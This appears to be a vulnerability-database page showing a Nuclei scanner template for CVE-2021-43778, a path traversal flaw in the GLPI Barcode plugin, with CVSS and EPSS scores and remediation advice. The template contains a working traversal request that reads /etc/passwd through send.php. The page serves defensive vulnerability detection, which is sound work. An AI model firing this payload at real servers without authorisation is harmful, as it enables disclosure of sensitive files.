Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2021-43778
HistoryDec 01, 2021 - 7:04 a.m.

GLPI plugin Barcode < 2.6.1 - Path Traversal Vulnerability.

2021-12-0107:04:29
ProjectDiscovery
github.com
4

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

0.524 Medium

EPSS

Percentile

97.5%

Barcode is a GLPI plugin for printing barcodes and QR codes. GLPI instances version 2.x prior to version 2.6.1 with the barcode plugin installed are vulnerable to a path traversal vulnerability.

id: CVE-2021-43778

info:
  name: GLPI plugin Barcode < 2.6.1 - Path Traversal Vulnerability.
  author: cckuailong
  severity: high
  description: Barcode is a GLPI plugin for printing barcodes and QR codes. GLPI instances version 2.x prior to version 2.6.1 with the barcode plugin installed are vulnerable to a path traversal vulnerability.
  impact: |
    An attacker can exploit this vulnerability to read arbitrary files on the server, potentially leading to unauthorized access or sensitive information disclosure.
  remediation: Upgrade to version 2.6.1 or later. Or, as a workaround, delete the `front/send.php` file.
  reference:
    - https://github.com/AK-blank/CVE-2021-43778
    - https://nvd.nist.gov/vuln/detail/CVE-2021-43778
    - https://github.com/pluginsGLPI/barcode/security/advisories/GHSA-2pjh-h828-wcw9
    - https://github.com/pluginsGLPI/barcode/releases/tag/2.6.1
    - https://github.com/pluginsGLPI/barcode/commit/428c3d9adfb446e8492b1c2b7affb3d34072ff46
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-43778
    cwe-id: CWE-22
    epss-score: 0.53541
    epss-percentile: 0.97558
    cpe: cpe:2.3:a:glpi-project:barcode:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: glpi-project
    product: barcode
  tags: cve,cve2021,glpi,lfi,plugin,traversal,glpi-project

http:
  - method: GET
    path:
      - "{{BaseURL}}/glpi/plugins/barcode/front/send.php?file=../../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 490a00463044022001be70fb443486c712120703936560a196126da58c1afc837570c82f4c35ec9802206eec0fba2e411b7d3cbf0b9bb15509191727d985e2f586884f060ab322a41b58:922c64590222798bb761d5b6d8e72950

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

0.524 Medium

EPSS

Percentile

97.5%

Related for NUCLEI:CVE-2021-43778